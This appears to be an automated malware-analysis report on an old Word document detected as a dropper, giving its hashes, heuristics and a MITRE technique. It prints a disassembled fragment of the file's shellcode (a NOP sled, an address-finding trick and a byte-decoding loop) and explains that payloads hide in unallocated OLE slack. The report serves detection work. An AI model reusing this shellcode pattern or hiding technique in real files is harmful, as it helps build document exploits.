Doc.Dropper.Agent-7093179-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 064d18b1fcaef0b8…

MALICIOUS

Office (OLE)

Size: 114.5 KB. Created: 2007-09-18 04:34:00. Authoring application: Microsoft Word 11. First seen: 2015-09-27.
MD5: 4e813691517fa1da9ae005173a3df550
SHA-1: 443430481250b9b461a1812102a361b29adcd13d
SHA-256: 064d18b1fcaef0b82c016350218c028594d341ad807bef21dc6d38d4b41f19c5
Risk Score: 140

Malware Insights

Doc.Dropper.Agent-7093179-0 · confidence 95%

MITRE ATT&CK
T1204.002 Malicious File

The critical ClamAV detection of 'Doc.Dropper.Agent-7093179-0' strongly suggests this OLE document is a dropper. The presence of a NOP sled and a significant slack region further supports this, indicating the file is structured to facilitate the execution of a secondary malicious payload. No specific IOCs were extracted from the document body or scripts.

Heuristics (3)

  • ClamAV: Doc.Dropper.Agent-7093179-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7093179-0
  • NOP sled detected high SC_NOP_SLED
    Found 20+ consecutive 0x90 bytes
    Disassembly (attempted x86 opcode disassembly):
    00000C30  90                nop
    00000C31  90                nop
    00000C32  90                nop
    00000C33  90                nop
    00000C34  90                nop
    00000C35  90                nop
    00000C36  90                nop
    00000C37  90                nop
    00000C38  90                nop
    00000C39  90                nop
    00000C3A  90                nop
    00000C3B  90                nop
    00000C3C  90                nop
    00000C3D  90                nop
    00000C3E  90                nop
    00000C3F  90                nop
    00000C40  90                nop
    00000C41  90                nop
    00000C42  90                nop
    00000C43  90                nop
    00000C44  90                nop
    00000C45  90                nop
    00000C46  eb03              jmp 0xc4b
    00000C48  5e                pop esi
    00000C49  ffe6              jmp esi
    00000C4B  e8f8ffffff        call 0xc48
    00000C50  40                inc eax
    00000C51  48                dec eax
    00000C52  90                nop
    00000C53  33c9              xor ecx, ecx
    00000C55  66b90a01          mov cx, 0x10a
    00000C59  90                nop
    00000C5A  83c619            add esi, 0x19
    00000C5D  56                push esi
    00000C5E  8bfe              mov edi, esi
    00000C60  ac                lodsb al, byte ptr [esi]
    00000C61  90                nop
    00000C62  c0c004            rol al, 4
    00000C65  aa                stosb byte ptr es:[edi], al
    00000C66  49                dec ecx
    00000C67  75f7              jne 0xc60
    00000C69  c3                ret
    00000C6A  55                push ebp
    00000C6B  b8ce38cec5        mov eax, 0xc5ce38ce
    00000C70  3565757c54        xor eax, 0x547c7565
    00000C75  0f4000            cmovo eax, dword ptr [eax]
    00000C78  0000              add byte ptr [eax], al
    00000C7A  099e7d000000      or dword ptr [esi + 0x7d], ebx
    00000C80  f8                clc
    00000C81  54                push esp
    00000C82  cf                iretd
    00000C83  46                inc esi
    00000C84  1a03              sbb al, byte ptr [ebx]
    00000C86  0000              add byte ptr [eax], al
    00000C88  00b804c0b807      add byte ptr [eax + 0x7b8c004], bh
    00000C8E  c1                .byte 0xc1
    00000C8F  da                .byte 0xda
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 117,248 bytes but its declared streams total only 16,486 bytes — 100,762 bytes (86%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).